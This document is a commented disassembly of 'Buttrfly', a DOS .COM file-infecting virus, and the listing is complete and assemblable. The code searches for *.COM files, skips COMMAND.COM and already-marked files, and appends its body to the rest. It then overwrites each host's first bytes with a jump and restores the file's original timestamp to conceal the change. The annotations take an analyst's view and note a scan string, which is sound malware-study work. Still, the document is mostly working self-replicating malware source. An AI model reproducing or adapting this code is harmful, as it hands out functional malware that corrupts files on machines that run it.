BUTTRFLY
;--------------------------------------------------------------------------
; Disassembled by FairWind
;--------------------------------------------------------------------------
.model tiny
.code
org 100h
; Entry stub of the carrier program. The file is a DOS .COM image
; (`org 100h`), so `start` is the first byte that runs.
start:
jmp virus               ; hop over the data bytes below into the virus body
nop
nop
; oldjmp, newjmp, the 90h byte and id are addressed as one 4-byte buffer
; starting at oldjmp. The code reads a candidate file's first four bytes
; into it, appends those bytes to the file, and copies them back to 100h
; before control returns to the host. In this carrier the initial contents
; are CD 20 90 01: `int 20h` (DOS terminate), `nop`, and the marker value.
oldjmp db 0cdh          ; byte 0 of the saved host header (later set to E9h)
newjmp db 20h           ; bytes 1-2: written as a word when the new jump is built
db 90h
id db 1                 ; byte 3: value 1 is tested as the "already infected" marker
; Virus entry point: computes a base displacement in BP, puts the saved
; host bytes back at 100h, redirects the DTA, and starts a *.COM search.
virus:
call delta              ; pushes the run-time address of `delta`
delta:
pop bp                  ; bp = run-time address of `delta`
; 10Bh is a hard-coded constant; presumably it was delta's assemble-time
; offset in the binary that was disassembled, so that [bp+label] addresses
; data wherever the body was appended - not verifiable from this listing.
sub bp,10Bh
mov di,100h             ; destination: first bytes of the in-memory COM image
lea si,[bp+oldjmp]      ; source: 4-byte saved-header buffer
mov cx,4
cld
rep movsb               ; copy the four saved bytes over the image start
mov ah,1Ah              ; DOS: set Disk Transfer Address
lea dx,[bp+dta]         ; use the private 43-byte buffer, not the default DTA
int 21h
mov byte ptr [bp+offset counter],0     ; per-run count of files written
mov ah,4Eh              ; DOS: find first matching file
lea si,[bp+dta+1eh]     ; si -> file-name field of the DTA search record
lea dx,[bp+fspec]       ; dx -> '*.COM' search pattern
push dx                 ; findfiles pops and re-pushes this pointer on each pass
jmp short findfiles
; Hands control back to the host program: resets the DTA, clears the
; general registers and jumps to 100h by way of a pushed return address.
returntohost:
mov ah,1Ah              ; DOS: set Disk Transfer Address
mov dx,80h              ; offset 80h - the default DTA location in the PSP
int 21h
; Registers are zeroed before the host's code runs.
xor ax,ax
xor bx,bx
xor cx,cx
xor dx,dx
xor si,si
xor di,di
mov sp,0FFFEh           ; reset the stack pointer; discards anything left pushed
mov bp,100h
push bp                 ; return address = 100h (start of the COM image)
xor bp,bp
retn                    ; pops 100h into IP, i.e. jumps to the image start
; Per-file cleanup and search loop. `closeup` puts the file's original
; time/date stamp back and closes the handle, `findnext`/`findfiles`
; issue the DOS directory search, and a match falls through to `infect`.
closeup:
or bx,bx                ; bx = open file handle, or 0 when none is open
jz findnext
; The next two instructions load the attribute byte from the DTA into CX,
; but CX is overwritten below before the DOS call, so they have no effect.
mov ch,0
mov cl,[bp+dta+15h]
mov ax,5701h            ; DOS: set file date and time for handle bx
mov cx,word ptr [bp+dta+16h]   ; time recorded by the directory search
mov dx,word ptr [bp+dta+18h]   ; date recorded by the directory search
; Analyst note: because the stamp captured at search time is written
; back, a modified file keeps its original timestamp.
int 21h
mov ah,3Eh              ; DOS: close handle
int 21h
xor bx,bx               ; mark "no handle open"
findnext:
mov ah,4Fh              ; DOS: find next matching file
findfiles:
pop dx                  ; recover the '*.COM' pointer pushed by the caller...
push dx                 ; ...and keep it on the stack for the next pass
mov cx,7                ; attribute mask: read-only + hidden + system
xor bx,bx
int 21h                 ; ah is 4Eh (first pass) or 4Fh (later passes)
jnc infect              ; carry clear = a file was found
jmp returntohost2       ; no more matches
; Embedded text bracketed by FFh bytes; it is data, never executed (the
; jmp above always transfers control away). If it lies within the 12Ah
; bytes written from `virus`, it is present in every modified file and
; can serve as a scan string.
vname db 0FFh
db 'Goddamn Butterflies'
db 0FFh
; Handles one file found by the search: opens it, applies four skip
; checks, appends data to the end and rewrites the first four bytes.
; Observable results, as far as this listing shows: the file grows by
; 4 + 12Ah = 302 bytes, byte 0 becomes E9h and byte 3 becomes 01h.
infect:
mov dx,si               ; si -> file name inside the DTA
mov ax,3D02h            ; DOS: open file, read/write access
int 21h
jc closeup              ; open failed (bx is 0 here, so nothing is closed)
mov bx,ax               ; bx = file handle
mov ah,3Fh              ; DOS: read from handle
mov cx,4
lea dx,[bp+oldjmp]      ; first four file bytes -> oldjmp..id buffer
int 21h
; Skip check 1: characters 5-6 of the file name (DTA offset 1Eh + 5).
; 444Eh is 'N','D' in memory order, which matches names such as
; COMMAND.COM.
mov ax,word ptr [bp+dta+23h]
cmp ax,444Eh
je closeup
; Skip check 2: fourth byte of the file already equals the marker value.
cmp [bp+id],1
je closeup
; Skip check 3: file size (low word from the DTA) below 121 bytes.
mov ax,word ptr [bp+dta+1ah]
cmp ax,121
jb closeup
mov ax,4202h            ; DOS: seek relative to end of file
cwd                     ; ax is positive, so this clears dx
xor cx,cx               ; cx:dx = 0 -> position at end; DOS returns length in dx:ax
int 21h
; Skip check 4: length above 64768 bytes (presumably so the enlarged file
; still fits one 64 KB COM segment - confirm).
cmp ax,64768
ja closeup
mov [bp+data],ax        ; remember the original file length
lea dx,[bp+oldjmp]
mov cx,4
mov ah,40h              ; DOS: write - append the four original header bytes
int 21h
lea dx,[bp+virus]
mov cx,12Ah             ; 298 bytes starting at the `virus` label
mov ah,40h              ; DOS: write - append the body after the saved bytes
int 21h
mov ax,4200h            ; DOS: seek relative to start of file
cwd
xor cx,cx               ; cx:dx = 0 -> position at byte 0
int 21h
; Build the replacement header: E9h, a 16-bit displacement of length+1,
; then the marker byte. A near jump at 100h with that displacement lands
; at 100h + length + 4, i.e. just past the four appended header bytes.
mov ax,[bp+data]
inc ax
mov word ptr [bp+newjmp],ax
mov [bp+oldjmp],0E9h
mov [bp+id],1
lea dx,[bp+oldjmp]
mov ah,40h              ; DOS: write the four-byte header at file offset 0
mov cx,4
int 21h
inc [bp+counter]
cmp [bp+counter],4      ; stop after four files have been written in this run
jae returntohost3
jmp closeup             ; restore the time stamp, close, continue searching
; Reached when the directory search reports no further matches.
returntohost2:
mov di,100h
cmp word ptr [di],20CDh ; tests whether the image starts with `int 20h` (CD 20)
; Both outcomes of this comparison arrive at returntohost3 (the taken
; branch and the fall-through are the same label), so the test does not
; change control flow in this listing.
je returntohost3
returntohost3:
jmp returntohost        ; common exit: reset state and run the host
; Data area, addressed at run time as [bp+label].
fspec db '*.COM',0      ; ASCIIZ search pattern passed to the find-first call
dta db 43 dup (0)       ; private Disk Transfer Area; offsets used by the code:
                        ;   15h attribute, 16h time, 18h date,
                        ;   1Ah size (low word), 1Eh file name
counter db 0            ; number of files written during this run (limit 4)
data dw 0               ; original length of the file being processed
end start